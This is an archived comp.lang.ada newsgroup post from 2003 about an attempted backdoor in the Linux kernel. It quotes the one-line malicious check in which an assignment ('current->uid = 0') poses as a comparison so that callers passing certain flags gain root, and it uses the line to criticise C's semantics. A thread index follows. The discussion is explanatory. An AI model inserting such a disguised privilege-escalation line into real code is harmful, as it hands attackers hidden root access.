Re: C's trikery semantic opens up backdoor in new Linux kernel

comp.lang.ada
 help / color / mirror / Atom feed

From: Vinzent 'Gadget' Hoefler <ada.rocks@jlfencey.com>
Subject: Re: C's trikery semantic opens up backdoor in new Linux kernel
Date: Wed, 12 Nov 2003 08:18:27 +0100
Date: 2003-11-12T08:18:27+01:00	[thread overview]
Message-ID: <bosmuu$1hui4o$1@ID-175126.news.uni-berlin.de> (raw)
In-Reply-To: pan.2003.11.12.05.13.39.401308@Smoke

J Cusick wrote:

>On Wed, 12 Nov 2003 04:26:44 +0000, Stephane Richard wrote:
>
>> For some reason, I can't open that link you posted here..
>
>The Register site seems to be down at the moment... The link is good.
>
>The article discusses the fact that someone tried to slide in a C line 
>(actually 2 lines) that trashed the tcp stack allowing a negative offset

No. It is worse than that.

The interesting line in question is this one:

|if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

First this looks like a sanity check. But look closer. This single
line serves one single purpose: to give you root-privileges when you
just pass the right flags. Note the "current->uid = 0" instead of
"current->uid == 0". Who the hell had the fucking bad idea that
assignments could return values?

Let's stretch the example and imagine, it was just a simple typo of a
tired programmer who wrote the PIN-code checking routine for an ATM
and it slipped through the review...

Vinzent.

next prev parent reply	other threads:[~2003-11-12  7:18 UTC|newest]

Thread overview: 44+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2003-11-12  3:17 C's trikery semantic opens up backdoor in new Linux kernel Adrian Hoe
2003-11-12  4:26 ` Stephane Richard
2003-11-12  5:13   ` J Cusick
2003-11-12  7:18     ` Vinzent 'Gadget' Hoefler [this message]
2003-11-12  7:50       ` Duncan Sands
2003-11-12 12:08         ` Vinzent 'Gadget' Hoefler
2003-11-12 13:38           ` Duncan Sands
2003-11-12 14:09             ` Vinzent 'Gadget' Hoefler
2003-11-13 21:04               ` Craig Carey
2003-11-14  6:45                 ` Freejack
2003-11-14  8:33                 ` Erlo Haugen
2003-11-14  9:44                   ` Vinzent 'Gadget' Hoefler
2003-11-14 10:16                     ` Dmitry A. Kazakov
2003-11-25 10:06                       ` Craig Carey
2003-11-25 11:20                         ` Dmitry A. Kazakov
2003-11-14 15:31                 ` Robert I. Eachus
2003-11-14 13:12               ` Georg Bauhaus
2003-11-14 13:31                 ` Duncan Sands
2003-11-14 14:56                 ` Vinzent 'Gadget' Hoefler
2003-11-14 15:08                   ` Georg Bauhaus
2003-11-14 15:38                     ` Duncan Sands
2003-11-14 17:57                       ` Georg Bauhaus
2003-11-14 15:47               ` Robert I. Eachus
2003-11-14 16:38                 ` Vinzent 'Gadget' Hoefler
2003-11-19  4:13             ` Dave Thompson
2003-11-21 15:34               ` Martin Krischik
2003-11-23  2:20                 ` Hyman Rosen
2003-11-27  4:22                 ` Dave Thompson
2003-11-28 14:01                   ` Hyman Rosen
2003-11-12 17:37       ` tmoran
2003-11-12 18:03       ` Warren W. Gay VE3WWG
2003-11-12  8:51     ` Adrian Hoe
2003-11-12 12:32       ` Preben Randhol
2003-11-13  5:50         ` Chad R. Meiners
2003-11-12 22:59       ` Wes Groleau
2003-11-14  3:31         ` Adrian Hoe
2003-11-14 11:00           ` Dmytry Lavrov
2003-11-15  5:00             ` Adrian Hoe
2003-11-15  5:02             ` Adrian Hoe
2003-11-16 11:29               ` Dmytry Lavrov
2003-11-17 17:07                 ` Warren W. Gay VE3WWG
2003-11-16 11:35             ` Dmytry Lavrov
2003-11-15 19:30           ` Wes Groleau
2003-11-12  8:52   ` Adrian Hoe

replies disabled

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox